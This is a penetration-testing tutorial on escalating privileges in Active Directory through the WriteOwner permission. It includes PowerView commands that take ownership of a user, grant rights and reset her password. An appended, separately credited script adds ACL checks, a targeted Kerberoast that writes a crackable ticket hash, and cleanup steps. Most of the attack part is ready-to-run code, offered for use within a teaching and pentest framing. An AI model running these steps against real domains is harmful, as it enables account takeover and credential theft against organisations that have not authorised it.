WriteOwner Exploit

Refer to: https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1431s


Last updated 4 years ago


What is the WriteOwner Permission For?

Active Directory objects such as users and groups are securable objects: each carries a security descriptor whose DACL is a list of ACEs defining which principals may read or modify the object (rename the account, reset its password, add members to a group, and so on). WriteOwner is the right to change the object's owner. On its own it grants nothing else, but the owner of an object implicitly holds WriteDacl, so an attacker who sets the owner to a principal they control can then write any ACE they like onto the object (ResetPassword, GenericAll, ...) and take it over. One caveat: if the DACL contains an ACE for the well-known OWNER RIGHTS SID (S-1-3-4), that ACE replaces the owner's implicit rights, so read the ACL before relying on this.

Scenario:

You have compromised an account belonging to Tom. BloodHound shows no direct path from Tom's account to Domain Admins, but checking Outbound Object Control reveals a path from Tom to the Backup Admins group through Claire.

Attack Path

  1. Tom has WriteOwner permissions over Claire

  2. Claire has GenericWrite permissions over the group BACKUP_ADMINS

  3. BACKUP_ADMINS sounds interesting :)

### Make tom the owner of claire's user object (this is what WriteOwner allows)
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

### As owner, tom implicitly has WriteDacl, so add an ACE granting tom the ResetPassword (User-Force-Change-Password) right on claire
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

### Build a SecureString and reset claire's password. Single quotes so PowerShell does not try to expand the trailing $.
### NOTE: in a real pentest do not reset a production user's password. Prefer a less disruptive route, e.g. enable reversible encryption or add an SPN so the user becomes Kerberoastable.
$cred = ConvertTo-SecureString 'qwer1234QWER!@#$' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $cred

Success. You can now log in as Claire with the new password: qwer1234QWER!@#$
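The same chain as an added worked example (not code from the original page or from PowerSploit): it first confirms from the ACLs that the path BloodHound reported really exists, records the original owner, takes ownership, grants GenericAll instead of just ResetPassword, then takes the non-destructive route the NOTE above mentions (add an SPN, Kerberoast Claire, remove the SPN) before cleaning up the ACE and handing ownership back. It assumes PowerView.ps1 is already dot-sourced in a session running as tom and that the names tom, claire and BACKUP_ADMINS match the scenario; the SPN value and the output file name are made up for the example.

```powershell
# Added example: WriteOwner takeover with pre-check, targeted Kerberoast and cleanup.
# Assumes PowerView (PowerSploit) is loaded and the session runs as tom.
$Attacker = 'tom'
$Victim   = 'claire'
$Group    = 'BACKUP_ADMINS'

# --- 1. Confirm the path straight from the ACLs ------------------------------
$attackerSid = (Get-DomainUser -Identity $Attacker -Properties objectsid).objectsid
$victimSid   = (Get-DomainUser -Identity $Victim   -Properties objectsid).objectsid

# An ACE on claire granting tom WriteOwner (directly, or implied by GenericAll)
$writeOwnerAce = Get-DomainObjectAcl -Identity $Victim -ResolveGUIDs |
    Where-Object {
        $_.SecurityIdentifier.Value -eq $attackerSid -and
        $_.ActiveDirectoryRights -match 'WriteOwner|GenericAll'
    }
if (-not $writeOwnerAce) { throw "$Attacker has no WriteOwner over $Victim; the path is not there" }

# Step 2 of the path: claire's GenericWrite over the group (abused on the next page)
$groupAce = Get-DomainObjectAcl -Identity $Group -ResolveGUIDs |
    Where-Object {
        $_.SecurityIdentifier.Value -eq $victimSid -and
        $_.ActiveDirectoryRights -match 'GenericWrite|GenericAll'
    }
if (-not $groupAce) { Write-Warning "$Victim has no GenericWrite over $Group; taking over $Victim may gain nothing" }

# --- 2. Record the current owner so it can be restored afterwards ------------
# Plain .NET/ADSI rather than PowerView: DirectoryEntry.ObjectSecurity is an
# ActiveDirectorySecurity object and GetOwner() returns the owner's SID.
$victimDn    = (Get-DomainUser -Identity $Victim -Properties distinguishedname).distinguishedname
$victimEntry = [ADSI]"LDAP://$victimDn"
$originalOwnerSid = $victimEntry.ObjectSecurity.GetOwner([System.Security.Principal.SecurityIdentifier]).Value
Write-Host "Original owner of ${Victim}: $(ConvertFrom-SID $originalOwnerSid)"

# --- 3. Take ownership, then use the owner's implicit WriteDacl to add an ACE -
Set-DomainObjectOwner -Identity $Victim -OwnerIdentity $Attacker
# -Rights All (GenericAll) covers both the SPN write below and a password reset;
# the page's original command grants only ResetPassword.
Add-DomainObjectAcl -TargetIdentity $Victim -PrincipalIdentity $Attacker -Rights All

# --- 4a. Non-destructive route: make claire Kerberoastable and roast her -----
# Any SPN works as long as it is unique in the forest; this value is invented.
$fakeSpn = "nonexistent/${Victim}.$(Get-Random)"
Set-DomainObject -Identity $Victim -Set @{ serviceprincipalname = $fakeSpn }
$roast = Get-DomainSPNTicket -SPN $fakeSpn -OutputFormat Hashcat
$roast.Hash | Out-File -FilePath ".\$Victim.kerberoast" -Encoding ascii
Set-DomainObject -Identity $Victim -Clear serviceprincipalname   # take the SPN away again
# Crack offline, e.g. hashcat -m 13100 claire.kerberoast wordlist.txt

# --- 4b. Destructive route (what the page does): reset the password ----------
# Only with explicit permission; single quotes keep the trailing $ literal.
# $pw = ConvertTo-SecureString 'qwer1234QWER!@#$' -AsPlainText -Force
# Set-DomainUserPassword -Identity $Victim -AccountPassword $pw

# --- 5. Cleanup. Order matters: removing the ACE needs WriteDacl, which tom only
# has while he is still the owner; restoring the owner afterwards works because
# tom's original WriteOwner ACE on claire is untouched.
Remove-DomainObjectAcl -TargetIdentity $Victim -PrincipalIdentity $Attacker -Rights All
Set-DomainObjectOwner -Identity $Victim -OwnerIdentity $originalOwnerSid
```

The Kerberoast route only pays off if Claire's password cracks, so it trades certainty for a much smaller footprint: the only lasting artifacts are directory change events, whereas a password reset locks the real user out and is noticed immediately. Whichever route is taken, the ownership and ACE changes should be reverted once the engagement no longer needs them, as the last two lines do.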

To take advantage of the WriteOwner and GenericWrite permissions we use PowerView, which is part of the PowerSploit collection.

Screenshots referenced in the original: BloodHound's Outbound Object Control option, and the attack path it identified.